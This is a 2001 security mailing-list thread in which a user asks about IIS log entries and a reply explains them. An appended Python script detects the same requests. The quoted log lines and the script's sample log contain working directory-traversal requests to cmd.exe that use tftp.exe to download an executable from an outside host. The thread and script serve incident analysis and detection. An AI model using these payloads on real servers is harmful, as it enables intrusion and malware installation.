[Dshield] What the heck is this? It does not look good.................

miroslaws@home.com miroslaws at home.com
Tue Aug 28 21:31:01 GMT 2001


Dear Paul,

> What the heck is this? It does not look good.................

I would agree with you. It seems to be an attempt to download the file 0.exe
to the C:\temp directory on your machine. In other words, somebody (IP
216.154.60.147), who believes in the existence of this security hole in your
computer, is trying to use the Windows TFTP.EXE program on your computer with
the option "-i" (for transferring in binary mode). I think the IP 216.154.60.147
could be a machine infected by something, and I am not sure what.

The first log line is not a problem because code 404 means the file is not
found.

I am concerned about the next two lines because error 502 (server error)
means he successfully activated the (cmd.exe) binary program on your
machine. Although he achieved nothing for now, it could be valuable
information for him in planning his future attempts.

Best Regards;

Miroslaw

----- Original Message -----
From: "Paul Marsh" <pmarsh at nmefdn.org>
To: "'Dshield (E-mail)" <dshield at dshield.org>
Sent: Tuesday, August 28, 2001 12:50 PM
Subject: [Dshield] What the heck is this? It does not look good.................


> 12:39:19 216.154.60.147 - GET
> /msadc/../../../../../../winnt/system32/cmd.exe
> /c+tftp.exe+"-i"+216.154.60.147+get+0.exe+c:\temp\0.exe 404
>  12:39:31 216.154.60.147 - GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+tftp.exe+"-i"+216.154.60.147+get+0.exe+c:\temp\0.exe 502
>  12:39:41 216.154.60.147 - GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+tftp.exe+"-i"+216.154.60.147+get+0.exe+c:\temp\0.exe 502
>
> Thanx, Paul
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www1.dshield.org/mailman/listinfo/dshield
>
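A small log check for the pattern Miroslaw describes, added here as an example and not part of either post: it normalizes the traversal encodings, picks the tftp.exe download out of the cmd.exe arguments, and reads the status code the way he does (404 versus 502). The sample lines are constructed to mirror Paul's, one request per line; the double-encoded request, the benign 10.0.0.5 entry and the verdict wording are assumptions of mine.

```python
"""Flag IIS log entries that traverse to cmd.exe and hand it a tftp.exe download.
Added example; sample lines are constructed (time, client IP, method, URI, query, status)."""
import re
from urllib.parse import unquote

# Overlong UTF-8 sequences IIS decoded as path separators; map them before URL decoding.
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\"}
CMD_EXE = re.compile(r"\.\./.*system32/cmd\.exe$")
# cmd.exe arguments of the form: tftp[.exe] "-i" <server> get <file> <destination>
TFTP = re.compile(r'tftp(?:\.exe)?\+"?-i"?\+(?P<src>[\d.]+)\+get\+(?P<file>[^+]+)\+(?P<dest>\S+)', re.I)
VERDICT = {404: "cmd.exe not reached (path rejected)",
           502: "cmd.exe ran; its output was not a valid CGI response",
           200: "cmd.exe ran and returned output"}

def normalize(path):
    """Lower-case, undo overlong and double encoding, unify separators."""
    low = path.lower()
    for enc, sep in OVERLONG.items():
        low = low.replace(enc, sep)
    return unquote(unquote(low)).replace("\\", "/")   # twice: %255c -> %5c -> \

def analyze(line):
    """Return a finding dict for a traversal-to-cmd.exe request, else None."""
    tokens = line.split()
    if len(tokens) < 7 or tokens[3].upper() != "GET":
        return None
    client, uri, status = tokens[1], tokens[4], int(tokens[-1])
    query = " ".join(tokens[5:-1])
    if not CMD_EXE.search(normalize(uri)):
        return None
    finding = {"client": client, "status": status, "payload": None,
               "verdict": VERDICT.get(status, "unknown status")}
    m = TFTP.search(query)
    if m:   # the request pulls a file from a TFTP server onto the web host
        finding["payload"] = {"tftp_server": m["src"], "file": m["file"], "dest": m["dest"]}
    return finding

# Constructed sample log: Paul's requests on single lines, a double-encoded
# variant (assumed), and one benign request.
SAMPLE_LOG = [
    '12:39:19 216.154.60.147 - GET /msadc/../../../../../../winnt/system32/cmd.exe '
    '/c+tftp.exe+"-i"+216.154.60.147+get+0.exe+c:\\temp\\0.exe 404',
    '12:39:31 216.154.60.147 - GET /_vti_bin/../../../../../../winnt/system32/cmd.exe '
    '/c+tftp.exe+"-i"+216.154.60.147+get+0.exe+c:\\temp\\0.exe 502',
    '12:40:02 216.154.60.147 - GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 200',
    '12:41:10 10.0.0.5 - GET /default.htm - 200',
]

def report(lines=SAMPLE_LOG):
    return [f for f in map(analyze, lines) if f]
```

A 502 on these requests means the CGI process started and produced no HTTP headers, which is why it deserves more attention than the 404.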